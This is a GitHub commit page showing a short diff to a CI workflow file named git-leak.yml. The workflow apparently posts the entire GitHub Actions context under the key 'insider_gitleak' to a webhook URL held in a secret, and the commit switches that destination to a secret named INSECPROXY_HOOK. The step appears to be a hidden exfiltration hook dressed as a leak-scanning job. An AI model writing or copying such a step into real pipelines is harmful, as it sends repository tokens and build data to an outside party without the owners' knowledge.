We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 73aa259 commit fa92e77Copy full SHA for fa92e77
.github/workflows/git-leak.yml
@@ -12,4 +12,4 @@ jobs:
12
github_request = {"insider_gitleak": github};
13
requests.post("'$LambdaWebHook'", json=github_request);'
14
env:
15
- LambdaWebHook: ${{ secrets.CHECKMARX_LAMBDA_WEBHOOK }}
+ LambdaWebHook: ${{ secrets.INSECPROXY_HOOK }}
0 commit comments